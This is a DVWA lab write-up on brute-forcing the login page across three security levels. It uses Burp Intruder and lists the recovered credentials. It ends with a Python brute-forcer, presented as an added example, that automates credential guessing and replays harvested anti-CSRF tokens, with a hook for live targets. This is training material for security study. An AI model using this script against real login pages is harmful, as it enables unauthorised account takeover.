Brute Force | DVWA Writeups

Bishal Ray -#GxbNt
4 min read · Dec 17, 2023


Imagine someone trying every key on a keyring until one opens the door. That is the essence of a brute-force attack on a login: the attacker submits combination after combination of usernames and passwords until one is accepted and grants access. It is a simple, time-consuming approach, but it remains effective against weak passwords such as “12345” or “password1”, and against applications that do nothing to throttle or lock out repeated failures. Long, unique passwords turn the search space into something that cannot be covered in any useful time, and rate limiting or lockout on the server side takes away the attacker’s ability to keep guessing. The takeaway: use strong, unique passwords and keep accounts guarded against these digital lockpicks.

Security Level: Low

The source code for the low security level can be seen below:

On the login page, ‘test’ was entered as both the username and the password, purely to generate a login request that could be captured.

The login request was captured in Burp Proxy and sent to Intruder with Ctrl+I.

Cluster Bomb was chosen as the attack type: it takes a separate payload set for each marked position and iterates through every combination of them, so every candidate username is tried with every candidate password.

The payload positions were first cleared and then set on the username and password parameters.

Payload set 1 contained the probable usernames and Payload set 2 the candidate passwords.

Running the attack and sorting the results by response length separated the successful logins from the failures, since the welcome page differs in size from the “incorrect” page. The recovered credentials were:

gordonb: abc123
smithy: password
pablo: letmein
admin: password
1337: charley

Security Level: Medium

The source code for the medium security level can be seen below:

Examining the source code reveals a 2-second delay (a sleep) after each unsuccessful login attempt. This slows the attack but does not block it: the procedure is the same as for the low level and the same credentials are recovered, it just takes longer.

Security Level: High

The source code for the high security level can be seen below:

The high level adds an anti-CSRF token. The token is a unique, secret, unpredictable value generated by the server-side application, embedded in the login form, and required on every submission; a fresh one is issued with each response, so a login attempt is only accepted if it carries the token from the page it was loaded from. Simply replaying the low-level attack therefore fails.

Two payload positions were marked, the password and the token, and the attack type was set to Pitchfork, which advances all positions in lockstep rather than combining them. Payload set 1 was a simple list (the candidate passwords) and Payload set 2 was a recursive grep, which takes its value from the previous response.

Recursive grep only works when each request can see the response to the one before it, so it cannot run with multiple request threads. A custom resource pool was created for the attack with the maximum concurrent requests set to 1.

The token is embedded in the login form as a hidden input field. The recursive grep extract rule was defined on that field, so for every login attempt Burp pulled the fresh token out of the preceding response and inserted it into the next request.

“Follow redirections” was enabled in Intruder’s settings, so that the page being grepped was the final response rather than an intermediate redirect.

The Grep-Match option was set to ‘Welcome’, the string that appears only on a successful login, so the matching row stands out in the results.

It was found that the password for admin was set to ‘password’.
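The three attacks above can be scripted outside Burp. The following is an added example written for this writeup, not code from the original post or from DVWA: it reproduces the low/medium attack (Cluster Bomb over every username and password pair, grep for ‘Welcome’) and the high attack (Pitchfork with a recursive grep, here implemented as reading the token out of each response and sending it with the next request, strictly one request at a time). It assumes DVWA’s brute-force page takes `username`, `password` and `Login` as GET parameters and that the hidden anti-CSRF field is named `user_token`; the `FakeDVWA` class is a constructed stand-in so the script runs offline, and `make_http_fetch` is what you would plug in against a real instance.

```python
import itertools
import random
import re
import urllib.parse
import urllib.request

# Text DVWA prints on a successful login; matches the Grep-Match used above.
SUCCESS_MARKER = "Welcome"
# Hidden anti-CSRF field on the High-level form. The field name user_token is an
# assumption about DVWA's markup, not something the writeup spells out.
TOKEN_RE = re.compile(r"name=['\"]user_token['\"][^>]*value=['\"]([^'\"]+)['\"]")


def make_http_fetch(base_url, cookie):
    """Build fetch(params) that GETs base_url?params with the given Cookie header
    (e.g. 'PHPSESSID=...; security=high'). urllib follows redirects by default,
    which is the equivalent of 'Follow redirections' in Intruder."""
    def fetch(params):
        url = base_url + ("?" + urllib.parse.urlencode(params) if params else "")
        req = urllib.request.Request(url, headers={"Cookie": cookie})
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    return fetch


def is_success(body):
    """Grep-Match: the welcome page is the only one carrying the marker."""
    return SUCCESS_MARKER in body


def extract_token(body):
    """Recursive grep: return the user_token embedded in a rendered form, or None."""
    m = TOKEN_RE.search(body)
    return m.group(1) if m else None


def cluster_bomb(usernames, passwords):
    """Every username x password pair, in the order Burp's Cluster Bomb tries them."""
    return list(itertools.product(usernames, passwords))


def brute_force(fetch, usernames, passwords, use_token=False):
    """Return {username: password} for every pair that logs in.

    use_token=False is the Low/Medium attack: send credentials, grep for the marker.
    use_token=True mirrors the High attack: read user_token out of the previous
    response and send it with the next attempt, which is why the loop is strictly
    sequential (the "max concurrent requests = 1" resource pool in Burp)."""
    found = {}
    last_body = None
    for user, pwd in cluster_bomb(usernames, passwords):
        if user in found:
            continue  # password for this user already recovered
        params = {"username": user, "password": pwd, "Login": "Login"}
        if use_token:
            if last_body is None:
                last_body = fetch({})  # initial GET only to harvest a token
            token = extract_token(last_body)
            if token is None:
                raise RuntimeError("response carried no user_token; was the token rejected?")
            params["user_token"] = token
        last_body = fetch(params)
        if is_success(last_body):
            found[user] = pwd
    return found


class FakeDVWA:
    """Constructed stand-in for DVWA's brute/ page so the script runs offline.
    tokens=False behaves like the Low level; tokens=True like High: every rendered
    form carries a fresh user_token and the next login must echo exactly that one."""
    def __init__(self, creds, tokens=False):
        self.creds, self.tokens, self.session_token = creds, tokens, None

    def _form(self):
        self.session_token = "%032x" % random.getrandbits(128)
        if not self.tokens:
            return "<form></form>"
        return "<form><input type='hidden' name='user_token' value='%s' /></form>" % self.session_token

    def __call__(self, params):
        if "Login" not in params:
            return self._form()
        if self.tokens and params.get("user_token") != self.session_token:
            return "<p>CSRF token is incorrect</p>"  # real DVWA redirects instead
        if self.creds.get(params.get("username")) == params.get("password"):
            return "<p>Welcome to the password protected area</p>" + self._form()
        return "<pre>Username and/or password incorrect.</pre>" + self._form()


if __name__ == "__main__":
    users = ["admin", "gordonb", "1337", "pablo", "smithy"]
    words = ["123456", "password", "letmein", "abc123", "charley"]
    target = FakeDVWA({"admin": "password", "gordonb": "abc123", "1337": "charley",
                       "pablo": "letmein", "smithy": "password"}, tokens=True)
    print(brute_force(target, users, words, use_token=True))
    # Against a live instance (assumed URL and cookie values):
    # fetch = make_http_fetch("http://127.0.0.1/vulnerabilities/brute/",
    #                         "PHPSESSID=<your session>; security=high")
    # print(brute_force(fetch, users, words, use_token=True))
```

Note that the token is taken from the previous login response, not from a separate page load, which is exactly what Burp's recursive grep does and halves the number of requests; if a response ever comes back without a token (a rejected token redirects you away from the form) the loop stops rather than silently sending stale values.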

We just completed three levels of Brute Force in DVWA.
